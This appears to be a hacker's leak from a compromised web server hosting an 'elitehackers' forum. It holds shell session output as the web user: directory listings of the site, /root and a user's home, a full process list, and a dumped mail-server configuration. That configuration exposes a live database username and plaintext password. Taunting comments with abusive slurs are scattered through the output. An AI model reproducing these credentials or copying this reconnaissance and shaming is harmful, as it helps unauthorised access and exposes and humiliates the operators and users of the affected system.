d--------- 18 elitehackers www-data 3072 Aug 30 18:34 forums-vb.3.6.10p4
-rw-r--r--  1 elitehackers www-data  537 Apr 13  2008 robots.txt
drwxrwxr-x  6 elitehackers www-data 1024 Nov 16 22:26 titanium


www-data@blaze:/var/vhosts/elitehackers.info/public_html$ ls -al forums
total 3153
drwxr-xr-x 19 elitehackers www-data   3072 Sep 12 19:50 .
drwxr-xr-x  5 elitehackers www-data   1024 Oct 25 16:38 ..
-rw-r--r--  1 elitehackers www-data  10509 Sep 12 17:02 LICENSE
-rw-r--r--  1 elitehackers www-data  19276 Apr 13  2008 accessmask.php
drwxr-xr-x  3 elitehackers www-data   2048 Sep 12 17:02 acp
-rw-r--r--  1 elitehackers www-data  39083 Apr 13  2008 admincalendar.php
-rw-r--r--  1 elitehackers www-data  48868 Apr 13  2008 admininfraction.php
-rw-r--r--  1 elitehackers www-data  17824 Apr 13  2008 adminlog.php
-rw-r--r--  1 elitehackers www-data   8214 Apr 13  2008 adminpermissions.php
-rw-r--r--  1 elitehackers www-data  25488 Apr 13  2008 adminreputation.php
-rw-r--r--  1 elitehackers www-data  21315 Sep 12 17:02 ajax.php
-rwxr-xr-x  1 elitehackers www-data  66718 Sep 12 17:02 album.php
-rw-r--r--  1 elitehackers www-data  17128 Sep 12 17:02 announcement.php
drwxr-xr-x  2 elitehackers www-data   1024 Apr 13  2008 archive
drwxr-xr-x  4 elitehackers www-data   1024 Apr 13  2008 articlebot
-rw-r--r--  1 elitehackers www-data  17270 Sep 12 17:02 attachment.php
-rw-r--r--  1 elitehackers www-data  12240 Apr 13  2008
attachmentpermission.php
-rw-r--r--  1 elitehackers www-data  19154 Apr 13  2008 avatar.php
-rw-r--r--  1 elitehackers www-data   7331 Apr 13  2008 backup.php
-rw-r--r--  1 elitehackers www-data  14198 Apr 13  2008 bbcode.php
-rw-r--r--  1 elitehackers www-data  75214 Sep 12 17:02 calendar.php
-rw-r--r--  1 elitehackers www-data  12112 Apr 13  2008 calendarpermission.php
-rw-r--r--  1 elitehackers www-data	43 Sep 12 17:02 clear.gif
drwxr-xr-x  4 elitehackers www-data   2048 Sep 12 17:54 clientscript
drwxr-xr-x  2 elitehackers www-data   1024 Apr 13  2008 control_examples
-rwxr-xr-x  1 elitehackers www-data  14265 Sep 12 17:02 converse.php
drwxr-xr-x  8 elitehackers www-data   1024 Apr 13  2008 cpstyles
-rw-r--r--  1 elitehackers www-data   3308 Sep 12 17:02 cron.php
-rw-r--r--  1 elitehackers www-data  23993 Apr 13  2008 cronadmin.php
-rw-r--r--  1 elitehackers www-data  10741 Apr 13  2008 cronlog.php
-rw-r--r--  1 elitehackers www-data  32592 Apr 13  2008 css.php
drwxr-xr-x  3 elitehackers www-data   1024 Sep 12 17:02 customavatars
drwxr-xr-x  2 elitehackers www-data   1024 Apr 13  2008 customprofilepics
-rw-r--r--  1 elitehackers www-data  19706 Apr 13  2008 diagnostic.php
-rw-r--r--  1 elitehackers www-data  47491 Sep 12 17:02 editpost.php
-rw-r--r--  1 elitehackers www-data  10625 Apr 13  2008 email.php
-rw-r--r--  1 elitehackers www-data  29307 Sep 12 17:02 external.php
-rw-r--r--  1 elitehackers www-data   9510 Sep 12 17:02 faq.php
-rw-r--r--  1 elitehackers www-data  10134 Sep 12 17:02 favicon.ico
-rw-r--r--  1 elitehackers www-data  27930 Apr 13  2008 forum.php
-rw-r--r--  1 elitehackers www-data  35429 Sep 12 17:02 forumdisplay.php
-rw-r--r--  1 elitehackers www-data  29517 Apr 13  2008 forumpermission.php
-rw-r--r--  1 elitehackers www-data  39178 Sep 12 17:02 global.php
-rw-r--r--  1 elitehackers www-data	 0 Apr 13  2008
google59be3bfa8906534f.html
-rwxr-xr-x  1 elitehackers www-data  95924 Sep 12 17:02 group.php
-rwxr-xr-x  1 elitehackers www-data  14604 Sep 12 17:02 group_inlinemod.php
-rw-r--r--  1 elitehackers www-data  25863 Apr 13  2008 help.php
-rw-r--r--  1 elitehackers www-data   7143 Sep 12 17:02 image.php
drwxr-xr-x 20 elitehackers www-data   1024 Apr 15  2008 images
drwxr-xr-x  3 elitehackers www-data   1024 Apr 13  2008 img
drwxr-xr-x  6 elitehackers www-data   5120 Sep 12 17:02 includes
-rwxr-xr-x  1 elitehackers www-data  18600 Sep 12 17:08 index.php
-rw-r--r--  1 elitehackers www-data  43466 Sep 12 17:02 infraction.php
-rw-r--r--  1 elitehackers www-data 182629 Sep 12 17:02 inlinemod.php
-rw-r--r--  1 elitehackers www-data   4617 Apr 15  2008 ipinfo.php
-rw-r--r--  1 elitehackers www-data   2802 Apr 13  2008 javachat.php
-rw-r--r--  1 elitehackers www-data  10333 Sep 12 17:02 joinrequests.php
-rw-r--r--  1 elitehackers www-data  37369 Apr 13  2008 language.php
-rw-r--r--  1 elitehackers www-data  10246 Sep 12 17:02 login.php
drwxr-xr-x  2 elitehackers www-data   1024 Apr 13  2008 mcp
-rw-r--r--  1 elitehackers www-data  16679 Sep 12 17:02 member.php
-rwxr-xr-x  1 elitehackers www-data  15536 Sep 12 17:02 member_inlinemod.php
-rw-r--r--  1 elitehackers www-data  35282 Sep 12 17:02 memberlist.php
-rw-r--r--  1 elitehackers www-data  23423 Sep 12 17:02 misc.php
-rw-r--r--  1 elitehackers www-data  57615 Sep 12 17:02 moderation.php
-rw-r--r--  1 elitehackers www-data   6747 Sep 12 17:02 moderator.php
-rw-r--r--  1 elitehackers www-data  14383 Apr 13  2008 modlog.php
-rw-r--r--  1 elitehackers www-data  18379 Sep 12 17:02 newattachment.php
-rw-r--r--  1 elitehackers www-data  36975 Sep 12 17:02 newreply.php
-rw-r--r--  1 elitehackers www-data   1924 Apr 13  2008 newsproxy.php
-rw-r--r--  1 elitehackers www-data  18608 Sep 12 17:02 newthread.php
-rw-r--r--  1 elitehackers www-data  19595 Sep 12 17:02 online.php
-rw-r--r--  1 elitehackers www-data  47478 Apr 13  2008 options.php
-rw-r--r--  1 elitehackers www-data   7687 Sep 12 17:02 payment_gateway.php
-rw-r--r--  1 elitehackers www-data  11901 Sep 12 17:02 payments.php
-rw-r--r--  1 elitehackers www-data  59137 Apr 13  2008 phrase.php
-rwxr-xr-x  1 elitehackers www-data   7327 Sep 12 17:02 picture.php
-rwxr-xr-x  1 elitehackers www-data  21646 Sep 12 17:02 picture_inlinemod.php
-rwxr-xr-x  1 elitehackers www-data  23758 Sep 12 17:02 picturecomment.php
drwxr-xr-x  4 elitehackers www-data   1024 Apr 13  2008 pjirc
-rw-r--r--  1 elitehackers www-data  82679 Apr 13  2008 plugin.php
-rw-r--r--  1 elitehackers www-data  27300 Sep 12 17:02 poll.php
-rwxr-xr-x  1 elitehackers www-data   9441 Sep 12 17:02 posthistory.php
-rw-r--r--  1 elitehackers www-data  73434 Sep 12 17:02 postings.php
-rw-r--r--  1 elitehackers www-data   6585 Sep 12 17:02 printthread.php
-rw-r--r--  1 elitehackers www-data  58062 Sep 12 17:02 private.php
-rw-r--r--  1 elitehackers www-data 144923 Sep 12 17:02 profile.php
-rw-r--r--  1 elitehackers www-data  35299 Apr 13  2008 profilefield.php
-rw-r--r--  1 elitehackers www-data  18158 Apr 13  2008 queries.php
-rw-r--r--  1 elitehackers www-data  11327 Apr 13  2008 ranks.php
-rw-r--r--  1 elitehackers www-data  39696 Sep 12 17:02 register.php
-rw-r--r--  1 elitehackers www-data  13623 Apr 13  2008 repair.php
-rw-r--r--  1 elitehackers www-data  15384 Apr 13  2008 replacement.php
-rw-r--r--  1 elitehackers www-data   5679 Sep 12 17:02 report.php
-rw-r--r--  1 elitehackers www-data  13711 Sep 12 17:02 reputation.php
-rw-r--r--  1 elitehackers www-data   9006 Apr 13  2008 request_award.php
-rw-r--r--  1 elitehackers www-data  10549 Apr 13  2008 resources.php
-rw-r--r--  1 elitehackers www-data  19898 Apr 13  2008 rssposter.php
-rw-r--r--  1 elitehackers www-data    526 Apr 13  2008 rules.php
-rw-r--r--  1 elitehackers www-data 124421 Sep 12 17:02 search.php
-rw-r--r--  1 elitehackers www-data  20222 Sep 12 17:02 sendmessage.php
-rw-r--r--  1 elitehackers www-data  10338 Sep 12 17:02 showgroups.php
-rw-r--r--  1 elitehackers www-data  11283 Sep 12 17:02 showpost.php
-rw-r--r--  1 elitehackers www-data  72938 Sep 12 17:02 showthread.php
drwxr-xr-x  2 elitehackers www-data   1024 Apr 13  2008 signaturepics
-rw-r--r--  1 elitehackers www-data   8634 Apr 13  2008 stats.php
drwxr-xr-x  2 elitehackers www-data   1024 Apr 26  2008 style
-rw-r--r--  1 elitehackers www-data   6477 Apr 13  2008 style.css
-rw-r--r--  1 elitehackers www-data  31229 Sep 12 17:02 subscription.php
-rw-r--r--  1 elitehackers www-data   8229 Apr 13  2008
subscriptionpermission.php
-rw-r--r--  1 elitehackers www-data  60501 Apr 13  2008 subscriptions.php
-rwxr-xr-x  1 elitehackers www-data  13122 Sep 12 17:02 tags.php
-rw-r--r--  1 elitehackers www-data  81574 Apr 13  2008 template.php
-rw-r--r--  1 elitehackers www-data   3907 Apr 13  2008 textarea.php
-rw-r--r--  1 elitehackers www-data  37427 Apr 13  2008 thread.php
-rw-r--r--  1 elitehackers www-data   8683 Sep 12 17:02 threadrate.php
-rwxr-xr-x  1 elitehackers www-data  12406 Sep 12 17:02 threadtag.php
drwxr-xr-x 17 elitehackers www-data   1024 Sep 12 21:27 titanium
-rw-r--r--  1 elitehackers www-data  83281 Apr 13  2008 user.php
-rw-r--r--  1 elitehackers www-data  30732 Sep 12 17:02 usercp.php
-rw-r--r--  1 elitehackers www-data  53162 Apr 13  2008 usergroup.php
-rw-r--r--  1 elitehackers www-data  19056 Sep 12 17:02 usernote.php
-rw-r--r--  1 elitehackers www-data   7334 Apr 13  2008 usertitle.php
-rw-r--r--  1 elitehackers www-data  54367 Apr 13  2008 usertools.php
drwxr-xr-x  2 elitehackers www-data   1024 Apr 13  2008 vBExternal
-rw-r--r--  1 elitehackers www-data  13419 Apr 13  2008 vBExternal.php
-rwxr-xr-x  1 elitehackers www-data  26085 Sep 12 17:02 visitormessage.php
-rw-r--r--  1 elitehackers www-data	16 Apr 13  2008
y_key_41c8718db5393f54.html

// That's right kids, world readable /root directory

www-data@blaze:/root$ ls -al
total 15
drwxr-xr-x  4 root root 1024 Oct 25 15:43 .
drwxr-xr-x 21 root root 1024 Aug 27 18:11 ..
drwx------  2 root root 1024 Aug  4 11:33 .aptitude
-rw-------  1 root root 3907 Oct 25 17:28 .bash_history
-rw-r--r--  1 root root  412 Dec 15  2004 .bashrc
-rw-------  1 root root    6 Oct  8 15:27 .nano_history
-rw-r--r--  1 root root  110 Nov 10  2004 .profile
drwx------  2 root root 1024 Aug 30 19:59 .ssh
-rw-------  1 root root  630 Oct 25 15:43 .viminfo
-rw-r--r--  1 root root 2059 Aug 30 22:56 GeorgeF_test.sql

// Napta's 0dayz lulz

www-data@blaze:/home/napta2k$ ls -al
total 82138
drwxr-xr-x 4 napta2k napta2k	 1024 Nov  9 14:59 .
drwxr-xr-x 5 root    root	 1024 Aug 30 16:53 ..
-rw------- 1 napta2k napta2k	 6885 Nov  9 16:15 .bash_history
-rw-r--r-- 1 napta2k napta2k	  220 Aug 27 17:09 .bash_logout
-rw-r--r-- 1 napta2k napta2k	  414 Aug 27 17:09 .bash_profile
-rw-r--r-- 1 napta2k napta2k	 2227 Aug 27 17:09 .bashrc
-rw------- 1 root    root	 3659 Sep 20 19:32 .mysql_history
-rw------- 1 root    root	 1024 Aug 31 14:22 .rnd
-rw------- 1 napta2k napta2k	 4323 Oct  3 20:21 .viminfo
-rw-r--r-- 1 napta2k napta2k 70284331 Sep 12 17:01 eh2005_ehforums.sql
drwxr-xr-x 4 napta2k napta2k	 1024 Sep 12 16:58 forums
-rw-r--r-- 1 napta2k napta2k  2829048 Sep  1 17:42 misc.sql
drwxr-xr-x 6 napta2k napta2k	 1024 Sep  4 13:00 nikto
-rw-r--r-- 1 napta2k napta2k  2590720 Sep 13 17:59 nikto-current.tar 
-rw-r--r-- 1 napta2k napta2k  2344960 Aug 31 14:39 postfixadmin-2.2.1.1.tar
-rw-r--r-- 1 napta2k napta2k  1378289 Aug 31 15:28
roundcubemail-0.2-alpha.1.tar.gz
-rw-r--r-- 1 napta2k napta2k  1003605 Sep 12 17:40 titanium.zip
-rw-r--r-- 1 napta2k napta2k  3309751 Nov  9 14:59
vbulletin_3-7-4_VBFAB23322.zip

// No 0dayz here :'(

www-data@blaze:/home/napta2k/nikto$ ls -al
total 20
drwxr-xr-x 6 napta2k napta2k  1024 Sep	4 13:00 .
drwxr-xr-x 4 napta2k napta2k  1024 Nov	9 14:59 ..
drwxr-xr-x 6 napta2k napta2k  1024 Sep	4 13:12 .svn
-rw-r--r-- 1 napta2k napta2k  2469 Sep	4 13:00 config.txt
drwxr-xr-x 3 napta2k napta2k  1024 Sep	4 13:00 docs
-rwxr-xr-x 1 napta2k napta2k 10495 Sep	4 13:00 nikto.pl
drwxr-xr-x 3 napta2k napta2k  1024 Sep	4 13:00 plugins
drwxr-xr-x 3 napta2k napta2k  1024 Sep	4 13:00 templates

www-data@blaze:/home/napta2k/nikto$ ps aux
USER	   PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root	     1	0.0  0.0   1856   632 ?        Ss   Aug30   0:06 init [2]
root	     2	0.0  0.0      0     0 ?        S    Aug30   0:01 [migration/0]
root	     3	0.0  0.0      0     0 ?        SN   Aug30   0:00 [ksoftirqd/0]
root	     4	0.0  0.0      0     0 ?        S    Aug30   0:00 [migration/1]
root	     5	0.0  0.0      0     0 ?        SN   Aug30   0:00 [ksoftirqd/1]
root	     6	0.0  0.0      0     0 ?        S    Aug30   0:00 [migration/2]
root	     7	0.0  0.0      0     0 ?        SN   Aug30   0:00 [ksoftirqd/2]
root	     8	0.0  0.0      0     0 ?        S    Aug30   0:00 [migration/3]
root	     9	0.0  0.0      0     0 ?        SN   Aug30   0:00 [ksoftirqd/3]
root	    10	0.0  0.0      0     0 ?        S<   Aug30   0:00 [events/0]
root	    11	0.0  0.0      0     0 ?        S<   Aug30   0:00 [events/1]
root	    12	0.0  0.0      0     0 ?        S<   Aug30   0:00 [events/2]
root	    13	0.0  0.0      0     0 ?        S<   Aug30   0:00 [events/3]
root	    14	0.0  0.0      0     0 ?        S<   Aug30   0:00 [khelper]
root	    15	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kthread]
root	    17	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xenwatch]
root	    18	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xenbus]
root	    28	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kblockd/0]
root	    29	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kblockd/1]
root	    30	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kblockd/2]
root	    31	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kblockd/3]
root	    32	0.0  0.0      0     0 ?        S<   Aug30   0:00 [cqueue/0]
root	    33	0.0  0.0      0     0 ?        S<   Aug30   0:00 [cqueue/1]
root	    34	0.0  0.0      0     0 ?        S<   Aug30   0:00 [cqueue/2]
root	    35	0.0  0.0      0     0 ?        S<   Aug30   0:00 [cqueue/3]
root	    37	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kseriod]
root	   109	0.0  0.0      0     0 ?        S    Aug30   0:00 [pdflush]
root	   111	0.0  0.0      0     0 ?        S<   Aug30   0:04 [kswapd0]
root	   112	0.0  0.0      0     0 ?        S<   Aug30   0:00 [aio/0]
root	   113	0.0  0.0      0     0 ?        S<   Aug30   0:00 [aio/1]
root	   114	0.0  0.0      0     0 ?        S<   Aug30   0:00 [aio/2]
root	   115	0.0  0.0      0     0 ?        S<   Aug30   0:00 [aio/3]
root	   117	0.0  0.0      0     0 ?        S<   Aug30   0:00 [jfsIO]
root	   118	0.0  0.0      0     0 ?        S<   Aug30   0:00 [jfsCommit]
root	   119	0.0  0.0      0     0 ?        S<   Aug30   0:00 [jfsCommit]
root	   120	0.0  0.0      0     0 ?        S<   Aug30   0:00 [jfsCommit]
root	   121	0.0  0.0      0     0 ?        S<   Aug30   0:00 [jfsCommit]
root	   122	0.0  0.0      0     0 ?        S<   Aug30   0:00 [jfsSync]
root	   123	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfslogd/0]
root	   124	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfslogd/1]
root	   125	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfslogd/2]
root	   126	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfslogd/3]
root	   127	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfsdatad/0]
root	   128	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfsdatad/1]
root	   129	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfsdatad/2]
root	   130	0.0  0.0      0     0 ?        S<   Aug30   0:00 [xfsdatad/3]
root	   739	0.0  0.0      0     0 ?        S<   Aug30   0:00 [net_accel/0]
root	   740	0.0  0.0      0     0 ?        S<   Aug30   0:00 [net_accel/1]
root	   741	0.0  0.0      0     0 ?        S<   Aug30   0:00 [net_accel/2]
root	   742	0.0  0.0      0     0 ?        S<   Aug30   0:00 [net_accel/3]
root	   750	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kpsmoused]
root	   753	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kcryptd/0]
root	   754	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kcryptd/1]
root	   755	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kcryptd/2]
root	   756	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kcryptd/3]
root	   757	0.0  0.0      0     0 ?        S<   Aug30   0:00 [kmirrord]
root	   767	0.0  0.0      0     0 ?        S<   Aug30   1:03 [kjournald]
root	  1158	0.0  0.0   1528   548 ?        Ss   Aug30   0:19 /sbin/syslogd
root	  1164	0.0  0.0   1484   364 ?        Ss   Aug30   0:00 /sbin/klogd -x
root	  1257	0.0  0.0   2088   832 ?        Ss   Aug30   0:00 /usr/sbin/cron
root	  1279	0.0  0.0   1480   476 tty1     Ss+  Aug30   0:00 /sbin/getty
38400 tty1
bind	  3880	0.0  0.3  20640  4140 ?        Ss   Aug30   0:00
/usr/sbin/named -u bind
bind	  3881	0.0  0.3  20640  4140 ?        S    Aug30   0:00
/usr/sbin/named -u bind
bind	  3882	0.0  0.3  20640  4140 ?        S    Aug30   1:16
/usr/sbin/named -u bind
bind	  3883	0.0  0.3  20640  4140 ?        S    Aug30   1:15
/usr/sbin/named -u bind
bind	  3884	0.0  0.3  20640  4140 ?        S    Aug30   1:16
/usr/sbin/named -u bind
bind	  3885	0.0  0.3  20640  4140 ?        S    Aug30   1:16
/usr/sbin/named -u bind
bind	  3886	0.0  0.3  20640  4140 ?        S    Aug30   0:00
/usr/sbin/named -u bind
bind	  3887	0.0  0.3  20640  4140 ?        S    Aug30   1:17
/usr/sbin/named -u bind
root	  6129	0.0  0.1   3572  1288 ?        S    Aug30   0:00 /bin/sh
/usr/bin/mysqld_safe
mysql	  6166	0.0  5.4  95064 60364 ?        S    Aug30   0:39
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
root	  6167	0.0  0.0   2656   556 ?        S    Aug30   0:00 logger -p
daemon.err -t mysqld_safe -i -t mysqld
mysql	  6168	0.0  5.4  95064 60364 ?        S    Aug30   0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6169	0.0  5.4  95064 60364 ?        S    Aug30   0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6170	0.0  5.4  95064 60364 ?        S    Aug30   0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6171	0.0  5.4  95064 60364 ?        S    Aug30   0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6172	0.0  5.4  95064 60364 ?        S    Aug30   0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6174	0.0  5.4  95064 60364 ?        S    Aug30   0:38
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6175	0.0  5.4  95064 60364 ?        S    Aug30   0:16
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6176	0.0  5.4  95064 60364 ?        S    Aug30   0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  6177	0.0  5.4  95064 60364 ?        S    Aug30   0:40
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
root	 32722	0.0  0.1   4708  1588 ?        Ss   Aug31   0:05
/usr/lib/postfix/master
postfix  32728	0.0  0.1   4752  1728 ?        S    Aug31   0:01 qmgr -l -t
fifo -u
root	 32742	0.0  0.0   1900   780 ?        Ss   Aug31  21:03
/usr/sbin/dovecot
root	 32743	0.0  0.3  10036  4116 ?        S    Aug31   9:40 dovecot-auth
postfix  32759	0.0  0.1   4848  2156 ?        S    Aug31   0:00 tlsmgr -l -t
unix -u -c
root	  9777	0.0  0.0   4824  1084 ?        Ss   Sep20   1:26 /usr/sbin/sshd
root	 14055	0.0  0.0   1648   596 ?        Ss   Oct08   0:00
/usr/sbin/inetd
root	  6877	0.0  0.0      0     0 ?        S    Oct31   0:00 [pdflush]
dovecot  11210	0.0  0.1   3168  1460 ?        S    00:31   0:01 pop3-login
dovecot  11211	0.0  0.1   3172  1464 ?        S    00:31   0:01 pop3-login
dovecot  11212	0.0  0.1   3168  1460 ?        S    00:31   0:01 pop3-login
dovecot  11214	0.0  0.1   3172  1460 ?        S    00:31   0:01 pop3-login
dovecot  11215	0.0  0.1   3172  1464 ?        S    00:31   0:01 pop3-login
dovecot  11216	0.0  0.1   3172  1464 ?        S    00:31   0:01 pop3-login
dovecot  11217	0.0  0.1   3168  1460 ?        S    00:31   0:01 pop3-login
dovecot  11218	0.0  0.1   3168  1460 ?        S    00:31   0:01 pop3-login
dovecot  11221	0.0  0.1   3168  1460 ?        S    00:31   0:01 pop3-login 
// LEARN 2 SYSADMIN YOU STUPID CUNT
// (we cleared 100 more pop3-login lines for your sake...
dovecot  11267	0.0  0.1   3172  1464 ?        S    00:32   0:01 pop3-login
dovecot  11268	0.0  0.1   3168  1460 ?        S    00:32   0:01 pop3-login
dovecot  11269	0.0  0.1   3168  1460 ?        S    00:32   0:01 pop3-login
dovecot  11271	0.0  0.1   3172  1460 ?        S    00:32   0:01 pop3-login
dovecot  11275	0.0  0.1   3168  1456 ?        S    00:32   0:01 pop3-login
dovecot  11276	0.0  0.1   3172  1464 ?        S    00:32   0:01 pop3-login
dovecot  11383	0.0  0.1   3168  1460 ?        S    00:46   0:01 pop3-login
dovecot  11387	0.0  0.1   3172  1464 ?        S    00:46   0:01 pop3-login
dovecot  12326	0.0  0.1   3172  1460 ?        S    03:00   0:01 pop3-login
dovecot  12328	0.0  0.1   3172  1464 ?        S    03:00   0:01 pop3-login
dovecot  12331	0.0  0.1   3172  1464 ?        S    03:00   0:01 pop3-login
root	 16065	0.0  0.7  23308  7852 ?        Ss   06:26   0:01
/usr/sbin/apache2 -k start
dovecot  17652	0.0  0.1   3168  1460 ?        S    09:58   0:00 pop3-login
dovecot  17653	0.0  0.1   3172  1464 ?        S    09:58   0:01 pop3-login
mysql	 22457	0.0  5.4  95064 60364 ?        S    14:00   0:05
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
dovecot   1932	0.0  0.1   3168  1460 ?        S    17:57   0:00 pop3-login
dovecot   1933	0.0  0.1   3172  1464 ?        S    17:57   0:00 pop3-login
dovecot   1934	0.0  0.1   3168  1456 ?        S    17:57   0:00 pop3-login
dovecot   2220	0.0  0.1   3168  1456 ?        S    18:07   0:00 pop3-login
dovecot   2224	0.0  0.1   3172  1464 ?        S    18:07   0:00 pop3-login
dovecot   2228	0.0  0.1   3172  1464 ?        S    18:07   0:00 pop3-login
mysql	  6852	0.0  5.4  95064 60364 ?        S    19:00   0:01
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  7005	0.0  5.4  95064 60364 ?        S    19:01   0:01
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  7384	0.0  5.4  95064 60364 ?        S    19:02   0:04
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  7406	0.0  5.4  95064 60364 ?        S    19:03   0:01
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  7491	0.0  5.4  95064 60364 ?        S    19:03   0:01
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  7577	0.0  5.4  95064 60364 ?        S    19:05   0:02
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql	  7584	0.0  5.4  95064 60364 ?        S    19:06   0:01
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
dovecot  23740	0.0  0.1   3172  1460 ?        S    22:13   0:00 pop3-login
dovecot  23741	0.0  0.1   3168  1460 ?        S    22:13   0:00 pop3-login
dovecot  23742	0.0  0.1   3172  1464 ?        S    22:13   0:00 pop3-login
postfix  24680	0.0  0.1   4712  1536 ?        S    22:20   0:00 pickup -l -t
fifo -u -c
www-data 26912	0.1  0.7  23756  8336 ?        S    22:41   0:00
/usr/sbin/apache2 -k start
www-data 26917	0.2  0.7  23736  8312 ?        S    22:41   0:00
/usr/sbin/apache2 -k start
www-data 26919	0.2  0.7  23736  8328 ?        S    22:41   0:01
/usr/sbin/apache2 -k start
www-data 26920	0.1  0.7  23752  8264 ?        S    22:41   0:00
/usr/sbin/apache2 -k start
www-data 26936	0.0  0.7  23648  8000 ?        S    22:43   0:00
/usr/sbin/apache2 -k start
www-data 26941	0.1  0.7  23728  8112 ?        S    22:44   0:00
/usr/sbin/apache2 -k start
www-data 26942	0.3  0.7  23704  8168 ?        S    22:44   0:00
/usr/sbin/apache2 -k start
www-data 26944	0.2  0.7  23704  8200 ?        S    22:44   0:00
/usr/sbin/apache2 -k start
www-data 26947	0.2  0.7  23752  8244 ?        S    22:44   0:00
/usr/sbin/apache2 -k start
www-data 26949	0.1  0.7  23772  8160 ?        S    22:45   0:00
/usr/sbin/apache2 -k start
www-data 26958	0.0  0.0   2120   884 ?        R    22:47   0:00 ps aux


www-data@blaze:/home/napta2k/nikto$$ cat  /etc/dovecot/dovecot-sql.conf
# This file is opened as root, so it should be owned by root and mode 0600.
#
# For the sql passdb module, you'll need a database with a table that
# contains fields for at least the userid and password. If you want to
# use the user@domain syntax, you might want to have a separate domain
# field as well.
#
# If your users all have the same uig/gid, and have predictable home
# directories, you can use the static userdb module to generate the home
# dir based on the userid and domain. In this case, you won't need fields
# for home, uid, or gid in the database.
#
# If you prefer to use the sql userdb module, you'll want to add fields
# for home, uid, and gid. Here is an example table:
#
# CREATE TABLE users (
#     userid VARCHAR(128) NOT NULL,
#     password VARCHAR(64) NOT NULL,
#     home VARCHAR(255) NOT NULL,
#     uid INTEGER NOT NULL,
#     gid INTEGER NOT NULL,
#     active CHAR(1) DEFAULT 'Y' NOT NULL
# );

# Database driver: mysql, pgsql, sqlite
driver = mysql
connect = host=127.0.0.1 user=postfixadmin password=postfixadmin32201
dbname=postfixadmin # free spoolz for everyone!

# Database connection string. This is driver-specific setting.
#
# pgsql:
